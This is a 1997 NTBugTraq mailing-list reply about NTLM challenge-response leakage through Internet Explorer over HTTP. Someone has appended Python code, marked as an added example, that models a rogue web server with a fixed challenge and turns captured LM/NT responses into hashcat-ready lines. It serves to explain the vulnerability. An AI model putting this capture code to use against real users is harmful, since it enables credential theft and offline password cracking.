Re: NT4.0 SP3 Still vulnerable

Russ (Russ.Cooper@RC.ON.CA)
Fri, 16 May 1997 14:07:25 -0400

>As far as I know, IE 3.02 corrected only sending NTLM logins through HTTP
>connections, and I suppose you are talking about capturing
>username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).

This information is incorrect. IE 3.02 does not prevent NTLM
negotiations from taking place via HTTP with any server that requests NTLM
authentication.

>I'm still downloading SP3, but after a look at the readme it looked to me
>that SP3 could empower an administrator to fix such a bug by enabling the
>SMB signing feature; it would not fix it at installation.

SMB signing does not alter NTLM negotiations, it modifies SMB sessions.

>And with or without SP3, filtering routers blocking ports 135/137/138/139
>make this exploit and similar ones limited to Intranets.

This information is incorrect. As long as IE is willing to negotiate an
authenticated connection to an HTTP server using NTLM, blocking the ports
you mention will have no effect. It's still possible to retrieve the
information via the HTTP channel. Granted, with the above ports closed
it may not be possible to use this information to exploit a system
through your routers, but this doesn't alter the fact that the
information may become known and exploited internally.

>Hasn't exploit code been released to SAMBA-DIGEST? It captures the
>password hashes, which someone could pass to l0phtcrack and similar
>crackers.

I think Aaron was likely referring to the code required on a non-NT web
server to get a browser to send an NTLM challenge response to a
pre-defined challenge, capture it, and parse it to obtain the plain-text
equivalent, which could then be input into some cracking program.

Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security
owner of the NTBugTraq mailing list:
http://ntbugtraq.rc.on.ca/index.html
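
The exchange Russ describes, as an added example that is not part of the original message and is not code written by Russ or Aaron: a minimal model of the HTTP side of the attack. A non-NT web server answers a request with a 401 and a "WWW-Authenticate: NTLM" header carrying an NTLM Type 2 message whose 8-byte server challenge is fixed by the attacker, then parses the Type 3 message the browser returns in its Authorization header to pull out the user, domain and the LM/NT challenge responses. Because the challenge is known in advance, the captured responses can be handed straight to an offline cracker. Assumptions: the message layouts follow the NTLMSSP wire format, but the challenge value (0x1122334455667788), the user/domain/workstation names and the 24-byte response bytes are constructed sample data, not captured traffic; the browser's real LM/NTLM responses (which need DES) are not computed here, and no actual HTTP listener is started. The output line uses the user::domain:LM:NT:challenge form that modern crackers accept for NetNTLMv1 (hashcat mode 5500), not l0phtcrack's 1997 import format.

```python
"""Added example: rogue HTTP server side of an NTLM challenge-response capture.

Constructed sample data throughout; this is not code from the original post.
"""
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001   # strings in the message are UTF-16-LE
NEGOTIATE_NTLM = 0x00000200      # NTLM (v1) authentication requested
DEFAULT_FLAGS = NEGOTIATE_UNICODE | NEGOTIATE_NTLM

# The rogue server always issues this challenge (constructed value). A fixed,
# known challenge is what makes the captured responses crackable offline.
FIXED_CHALLENGE = bytes.fromhex("1122334455667788")

# Constructed stand-ins for the browser's 24-byte LM and NT responses.
SAMPLE_LM = bytes(range(0x10, 0x28))
SAMPLE_NT = bytes(range(0xA0, 0xB8))


def _field(length: int, offset: int) -> bytes:
    """NTLMSSP security-buffer descriptor: Len, MaxLen, Offset (little-endian)."""
    return struct.pack("<HHI", length, length, offset)


def build_type2(challenge: bytes, flags: int = DEFAULT_FLAGS) -> bytes:
    """NTLM Type 2 (CHALLENGE_MESSAGE) with empty TargetName and TargetInfo buffers."""
    if len(challenge) != 8:
        raise ValueError("server challenge must be exactly 8 bytes")
    header_len = 48
    return (NTLMSSP_SIGNATURE
            + struct.pack("<I", 2)
            + _field(0, header_len)      # TargetName (empty)
            + struct.pack("<I", flags)
            + challenge                  # ServerChallenge: attacker-chosen, constant
            + b"\x00" * 8                # Reserved
            + _field(0, header_len))     # TargetInfo (empty)


def challenge_header(challenge: bytes = FIXED_CHALLENGE) -> str:
    """Value of the WWW-Authenticate header sent with the server's 401 response."""
    return "NTLM " + base64.b64encode(build_type2(challenge)).decode("ascii")


def build_type3(user: str, domain: str, workstation: str, lm_response: bytes,
                nt_response: bytes, flags: int = DEFAULT_FLAGS) -> bytes:
    """Constructed Type 3 (AUTHENTICATE_MESSAGE) standing in for what the browser sends."""
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    payload = [lm_response, nt_response, domain.encode(enc), user.encode(enc),
               workstation.encode(enc), b""]   # last buffer: encrypted session key
    fields, offset = b"", 64                  # 64-byte header precedes the payload
    for buf in payload:
        fields += _field(len(buf), offset)
        offset += len(buf)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 3) + fields
            + struct.pack("<I", flags) + b"".join(payload))


def _buffer(msg: bytes, descriptor_offset: int) -> bytes:
    """Resolve a security-buffer descriptor, refusing offsets outside the message."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, descriptor_offset)
    if offset + length > len(msg):
        raise ValueError("security buffer points outside the message")
    return msg[offset:offset + length]


def parse_type3(msg: bytes) -> dict:
    """Extract user, domain, workstation and both challenge responses from a Type 3."""
    if len(msg) < 52 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != 3:
        raise ValueError(f"expected NTLM Type 3, got Type {msg_type}")
    # Flags follow the session-key descriptor; very old clients omit both.
    flags = struct.unpack_from("<I", msg, 60)[0] if len(msg) >= 64 else 0
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    return {
        "lm_response": _buffer(msg, 12),
        "nt_response": _buffer(msg, 20),
        "domain": _buffer(msg, 28).decode(enc),
        "user": _buffer(msg, 36).decode(enc),
        "workstation": _buffer(msg, 44).decode(enc),
    }


def parse_authorization(header_value: str) -> dict:
    """Handle the browser's 'Authorization: NTLM <base64>' request header."""
    scheme, _, token = header_value.partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("not an NTLM Authorization header")
    return parse_type3(base64.b64decode(token))


def cracker_line(captured: dict, challenge: bytes = FIXED_CHALLENGE) -> str:
    """user::domain:LM:NT:challenge, the NetNTLMv1 line accepted by hashcat -m 5500."""
    return "{u}::{d}:{lm}:{nt}:{c}".format(
        u=captured["user"], d=captured["domain"], lm=captured["lm_response"].hex(),
        nt=captured["nt_response"].hex(), c=challenge.hex())


def demo() -> tuple:
    """Run the three-leg exchange with constructed browser data."""
    www_authenticate = challenge_header()
    type3 = build_type3("jdoe", "CORP", "WS01", SAMPLE_LM, SAMPLE_NT)
    authorization = "NTLM " + base64.b64encode(type3).decode("ascii")
    return www_authenticate, cracker_line(parse_authorization(authorization))


if __name__ == "__main__":
    served, captured_line = demo()
    print("server -> browser  WWW-Authenticate:", served)
    print("browser -> server  captured:", captured_line)
```

Note that nothing in this exchange touches TCP 135-139: the whole negotiation rides inside ordinary HTTP request and response headers, which is the point Russ is making about router filters.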